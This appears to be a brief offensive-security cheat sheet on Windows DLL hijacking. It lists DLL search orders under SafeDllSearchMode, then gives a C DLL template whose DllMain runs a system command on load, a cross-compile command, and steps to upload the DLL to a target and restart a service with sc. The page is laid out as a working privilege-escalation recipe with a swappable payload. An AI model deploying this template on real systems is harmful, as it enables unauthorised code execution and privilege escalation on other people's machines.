1011 B
1011 B
DLL Hijacking
Basics
Search Orders
-
SafeDllSearchMode enabled searches paths in following order:
- cwd of executable
- System directory,
GetSystemDirectory
- 16-bit system directory
- Windows,
GetWindowsDirectory
- pwd
- PATH
-
SafeDllSearchMode disabled searches in following order:
- cwd of executable
- pwd
- System directory
- 16-bit system directory
- Windows directory
- PATH environment variable
Template
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}
- Compilation via
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
- Upload to target
- Restart dllsvervice via
sc stop dllsvc
sc start dllsvc